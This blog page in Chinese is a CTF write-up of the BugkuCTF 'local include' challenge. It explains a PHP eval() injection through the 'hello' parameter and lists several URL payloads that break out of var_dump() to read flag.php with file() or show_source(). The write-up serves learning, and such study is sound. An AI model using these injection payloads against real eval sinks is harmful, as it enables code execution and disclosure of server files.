<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5"><title>一道ctf题小结(还是自己能力不行) | Manayakko - 微笑才是王道</title><meta name="description" content="一道ctf题小结(还是自己能力不行)"><meta name="keywords" content="ctf,code audit"><meta name="author" content="Manayakko"><meta name="copyright" content="Manayakko"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/yakko117/img/favicon.png"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin><meta name="twitter:card" content="summary"><meta name="twitter:title" content="一道ctf题小结(还是自己能力不行)"><meta name="twitter:description" content="一道ctf题小结(还是自己能力不行)"><meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs276gj2j30id0ey3yy.jpg"><meta property="og:type" content="article"><meta property="og:title" content="一道ctf题小结(还是自己能力不行)"><meta property="og:url" content="https://manayakko.github.io/yakko117/2019/03/10/bugku%E6%9C%AC%E5%9C%B0%E5%8C%85%E5%90%AB/"><meta property="og:site_name" content="Manayakko - 微笑才是王道"><meta property="og:description" content="一道ctf题小结(还是自己能力不行)"><meta property="og:image" content="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs276gj2j30id0ey3yy.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = 'false'
var t = Cookies.get("theme");
if (autoChangeMode == '1'){
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

if (t === undefined){
  if (isLightMode) activateLightMode()
  else if (isDarkMode) activateDarkMode()
  else if (isNotSpecified || hasNoSupport){
    console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
    now = new Date();
    hour = now.getHours();
    isNight = hour < 6 || hour >= 18
    isNight ? activateDarkMode() : activateLightMode()
}
} else if (t == 'light') activateLightMode()
else activateDarkMode()


} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/yakko117/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://manayakko.github.io/yakko117/2019/03/10/bugku%E6%9C%AC%E5%9C%B0%E5%8C%85%E5%90%AB/"><link rel="prev" title="XCTF adworld web（新手入门篇）" href="https://manayakko.github.io/yakko117/2019/03/17/XCTF%20adworld%20web%EF%BC%88%E6%96%B0%E6%89%8B%E5%85%A5%E9%97%A8%E7%AF%87%EF%BC%89/"><link rel="next" title="浅谈PHP序列化和反序列化" href="https://manayakko.github.io/yakko117/2019/03/03/%E6%B5%85%E8%B0%88PHP%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/yakko117/',
  algolia: undefined,
  localSearch: {"path":"./yakko117/search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://xxx/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: false,
  copyright: {"languages":{"author":"作者: Manayakko","link":"链接: https://manayakko.github.io/yakko117/2019/03/10/bugku%E6%9C%AC%E5%9C%B0%E5%8C%85%E5%90%AB/","source":"来源: Manayakko - 微笑才是王道","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  isHome: false,
  isPost: true
  
}</script><meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/yakko117/atom.xml" title="Manayakko - 微笑才是王道" type="application/atom+xml">
</head><body><header> <div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/yakko117/">Manayakko - 微笑才是王道</a></span><span class="toggle-menu pull_right close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/yakko117/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/link/"><i class="fa-fw fa fa-link"></i><span> 友情链接</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/about/"><i class="fa-fw fa fa-simplybuilt"></i><span> 关于本人</span></a></div></div></span><span class="pull_right" id="search_button"><a class="site-page social-icon search"><i class="fa fa-search fa-fw"></i><span> 搜索</span></a></span></div></header><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/yakko117/img/avatar.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/yakko117/archives/"><div class="headline">文章</div><div class="length_num">63</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/yakko117/tags/"><div class="headline">标签</div><div class="length_num">10</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/yakko117/categories/"><div class="headline">分类</div><div class="length_num">3</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/yakko117/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/link/"><i class="fa-fw fa fa-link"></i><span> 友情链接</span></a></div><div class="menus_item"><a class="site-page" href="/yakko117/about/"><i class="fa-fw fa fa-simplybuilt"></i><span> 关于本人</span></a></div></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目录</div><div class="sidebar-toc__content"><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#BugkuCTF-本地包含"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">BugkuCTF 本地包含</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#代码解释"><span class="toc_mobile_items-number">1.0.1.</span> <span class="toc_mobile_items-text">代码解释</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#注入理解"><span class="toc_mobile_items-number">1.0.2.</span> <span class="toc_mobile_items-text">注入理解</span></a></li></ol></li></ol></li></ol></div></div></div><div id="body-wrap"><div id="web_bg" data-type="photo"></div><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#BugkuCTF-本地包含"><span class="toc-number">1.</span> <span class="toc-text">BugkuCTF 本地包含</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#代码解释"><span class="toc-number">1.0.1.</span> <span class="toc-text">代码解释</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#注入理解"><span class="toc-number">1.0.2.</span> <span class="toc-text">注入理解</span></a></li></ol></li></ol></li></ol></div></div></div><main id="content-outer"><div id="top-container" style="background-image: url(https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs276gj2j30id0ey3yy.jpg)"><div id="post-info"><div id="post-title"><div class="posttitle">一道ctf题小结(还是自己能力不行)</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 发表于 2019-03-10<span class="post-meta__separator">|</span><i class="fa fa-history fa-fw" aria-hidden="true"></i> 更新于 2019-03-10</time><span class="post-meta__separator">|</span><span><i class="fa fa-inbox post-meta__icon fa-fw" aria-hidden="true"></i><a class="post-meta__categories" href="/yakko117/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a></span><div class="post-meta-wordcount"><div class="post-meta-pv-cv"></div></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><h1 id="BugkuCTF-本地包含"><a href="#BugkuCTF-本地包含" class="headerlink" title="BugkuCTF 本地包含"></a>BugkuCTF 本地包含</h1><p><a href="http://120.24.86.145:8003/" target="_blank" rel="noopener">题目链接</a><br>怎么说呢，虽说不算难，但是考的基础知识还是值得探讨分析一下的</p>
<a id="more"></a>

<h3 id="代码解释"><a href="#代码解释" class="headerlink" title="代码解释"></a>代码解释</h3><p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs277yv3j30cz059t94.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs277yv3j30cz059t94.jpg" class="lazyload"></a></p>
<p>a. <code>include&quot;flag.php&quot;</code>; 把我们想要的弗拉格藏了起来，哼<br>b. <code>$_request</code>这个变量对 <code>GET</code> 、<code>POST</code> 都能接受，但这个全局变量在运行时修改后者不会影响前者（反之亦然）<br>c. 以<code>get</code> / <code>post</code> / <code>cookies</code> 等方式把以hello为名的东西提交过来<br>d. eval函数把字符串当作命令直接执行</p>
<hr>
<p>首先选择 <code>get</code> 传值<br>根据最基本注入 <code>&#39;&#39;</code> 引号闭合的思路，很容易就想到了利用括号，毕竟，<code>eval</code> 中是执行的代码段。</p>
<p>测试一下：</p>
<div class="code-area-wrap"><div class="highlight-tools"><i class="fa fa-angle-down code-expand" aria-hidden="true"></i><div class="code_lang">Code</div></div><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;123.206.87.240:8003&#x2F;index.php?hello&#x3D;%201);print_r(2</span><br></pre></td></tr></table></figure></div>
<p>代码结合起来就是：</p>
<pre><code>eval( &quot;var_dump(1);print_r(2);&quot;); </code></pre><p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs278b65j30hy05lwep.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs278b65j30hy05lwep.jpg" class="lazyload"></a><br>发现还行，既然执行没问题，就可以构造名字为hello的攻击命令，把flag.php里面的代码以数组形式输出出来。</p>
<p>最后在url里如此构造攻击命令：</p>
<pre><code>?hello=file(&quot;flag.php&quot;)</code></pre><p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs2798yvj31ej065wfd.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs2798yvj31ej065wfd.jpg" class="lazyload"></a></p>
<pre><code>?hello=get_file_contents(&apos;flag.php&apos;) // 或者这种</code></pre><p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs2798yvj31ej065wfd.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs2798yvj31ej065wfd.jpg" class="lazyload"></a></p>
<pre><code>?hello=1);print_r(file(&quot;./flag.php&quot;)</code></pre><p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs279ecpj314c051gm6.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs279ecpj314c051gm6.jpg" class="lazyload"></a></p>
<p>除了直接将 <strong>flag.php</strong> 文件读入变量 <code>hello</code> 中；还可利用 <code>eval()</code> 的命令执行漏洞，使用hello构造payload：</p>
<pre><code>?hello=1);show_source(%27flag.php%27);var_dump(3</code></pre><p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs278kv4j30o808hdgc.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs278kv4j30o808hdgc.jpg" class="lazyload"></a></p>
<hr>
<h3 id="注入理解"><a href="#注入理解" class="headerlink" title="注入理解"></a>注入理解</h3><p>file()函数的作用是读取文件，然后以数组的形式返回<br>eval函数中， <code>&quot; &quot;</code> 内部为代码， <code>//</code> 只在代码中起作用，相当于只注释了<code>)</code>；<br>然后我们来分析一下 <code>file_get_contents</code> 与 <code>file</code> 及 <code>var_dump</code>，<code>print_r</code> 和 <code>echo</code> </p>
<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xw55a4jyj30ao043mx9.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xw55a4jyj30ao043mx9.jpg" class="lazyload"></a></p>
<p><a href="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xw55abpfj30bq05v0t5.jpg" target="_blank" rel="noopener" data-fancybox="group" data-caption="test" class="fancybox"><img alt="test" title="test" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xw55abpfj30bq05v0t5.jpg" class="lazyload"></a></p>
<p>返回值如下</p>
<pre><code>Array ( [0] =&gt; icnlude &quot;flag.php&quot;; [2] =&gt; $a = @$_Request[&apos;hello&apos;]; [3] =&gt; eval(&quot;var_dump($a);&quot;); [4] =&gt; show_source(__file__); [5] =&gt; ?&gt; )</code></pre><p>后面的坑再添吧</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Manayakko</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://manayakko.github.io/yakko117/2019/03/10/bugku%E6%9C%AC%E5%9C%B0%E5%8C%85%E5%90%AB/">https://manayakko.github.io/yakko117/2019/03/10/bugku%E6%9C%AC%E5%9C%B0%E5%8C%85%E5%90%AB/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://manayakko.github.io/yakko117">Manayakko - 微笑才是王道</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/yakko117/tags/ctf/">ctf    </a><a class="post-meta__tags" href="/yakko117/tags/code-audit/">code audit    </a></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs276gj2j30id0ey3yy.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lazyload post-qr-code__img" src="/yakko117/img/Wechat.jpg" alt="微信"><div class="post-qr-code__desc">微信</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/yakko117/2019/03/17/XCTF%20adworld%20web%EF%BC%88%E6%96%B0%E6%89%8B%E5%85%A5%E9%97%A8%E7%AF%87%EF%BC%89/"><img class="prev_cover lazyload" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img2/0077TIyQly1g14y8jlo1sj303q044wed.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>XCTF adworld web（新手入门篇）</span></div></a></div><div class="next-post pull_right"><a href="/yakko117/2019/03/03/%E6%B5%85%E8%B0%88PHP%E5%BA%8F%E5%88%97%E5%8C%96%E5%92%8C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"><img class="next_cover lazyload" data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img2/0077TIyQly1g0ps6u8qf1j30xc0jvwl3.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>浅谈PHP序列化和反序列化</span></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/yakko117/2019/04/05/Bugkuctf/" title="Bugku吹头发 writeup（慢慢更）"><img class="relatedPosts_cover lazyload"data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/6b8c14f8gy1fvcdnepp5yj218g0tn48s.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-history fa-fw" aria-hidden="true"></i> 2019-04-05</div><div class="relatedPosts_title">Bugku吹头发 writeup（慢慢更）</div></div></a></div><div class="relatedPosts_item"><a href="/yakko117/2020/02/12/php小特性/" title="从一道题学习php的小特性"><img class="relatedPosts_cover lazyload"data-src="https://manayakko.github.io/yakko117/img/index2.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-history fa-fw" aria-hidden="true"></i> 2020-02-12</div><div class="relatedPosts_title">从一道题学习php的小特性</div></div></a></div><div class="relatedPosts_item"><a href="/yakko117/2020/01/31/2020新春红包/" title="赵师傅的新春红包题"><img class="relatedPosts_cover lazyload"data-src="https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img2/redpack.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-history fa-fw" aria-hidden="true"></i> 2020-01-31</div><div class="relatedPosts_title">赵师傅的新春红包题</div></div></a></div></div><div class="clear_both"></div></div></div></main><footer id="footer" style="background-image: url(https://cdn.jsdelivr.net/gh/Manayakko/PicBed/img/0077TIyQly1g0xs276gj2j30id0ey3yy.jpg)" data-type="photo"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2023 By Manayakko</div><div class="framework-info"><span>驱动 </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener"><span>Butterfly</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/yakko117/js/utils.js"></script><script src="/yakko117/js/main.js"></script><script src="/yakko117/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({
  tex2jax: {
    inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
    processEscapes: true,
    skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
  },
  CommonHTML: {
    linebreaks: { automatic: true, width: "90% container" }
  },
  "HTML-CSS": { 
    linebreaks: { automatic: true, width: "90% container" }
  },
  "SVG": { 
    linebreaks: { automatic: true, width: "90% container" }
  }
});
</script><script type="text/x-mathjax-config">MathJax.Hub.Queue(function() {
  var all = MathJax.Hub.getAllJax(), i;
  for (i=0; i < all.length; i += 1) {
    all[i].SourceElement().parentNode.className += ' has-jax';
  }
});
</script><script src="https://cdn.jsdelivr.net/npm/mathjax/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script src="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.css"><script>$(function () {
  $('span.katex-display').wrap('<div class="katex-wrap"></div>')
})</script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div><script src="/yakko117/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/yakko117/live2dw/assets/assets/shizuku.model.json"},"display":{"position":"right","hOffset":60,"vOffset":-20,"width":90,"height":180},"mobile":{"show":false},"log":false});</script></body></html>